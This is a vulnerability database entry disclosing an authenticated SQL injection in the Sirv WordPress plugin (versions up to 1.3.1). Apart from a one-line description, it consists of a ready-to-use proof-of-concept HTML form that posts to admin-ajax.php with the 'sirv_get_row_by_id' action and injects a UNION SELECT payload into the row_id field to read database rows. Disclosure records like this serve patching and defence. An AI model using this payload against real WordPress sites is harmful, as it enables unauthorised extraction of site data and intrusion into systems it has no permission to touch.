Sirv <= 1.3.1 - Authenticated SQL Injection

2016-11-21T00:00:00
ID WPEX-ID:8673
Type wpexploit
Reporter Lenon Leite
Modified 2019-11-28T00:00:00

Description

WordPress Vulnerability - Sirv <= 1.3.1 - Authenticated SQL Injection

                                        
                                            &lt;form method="post" action="http://target/wp-admin/admin-ajax.php"&gt;
    &lt;input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1"&gt;
    &lt;input type="text" name="action" value="sirv_get_row_by_id"&gt;
    &lt;input type="submit" value="Send"&gt;
&lt;/form&gt;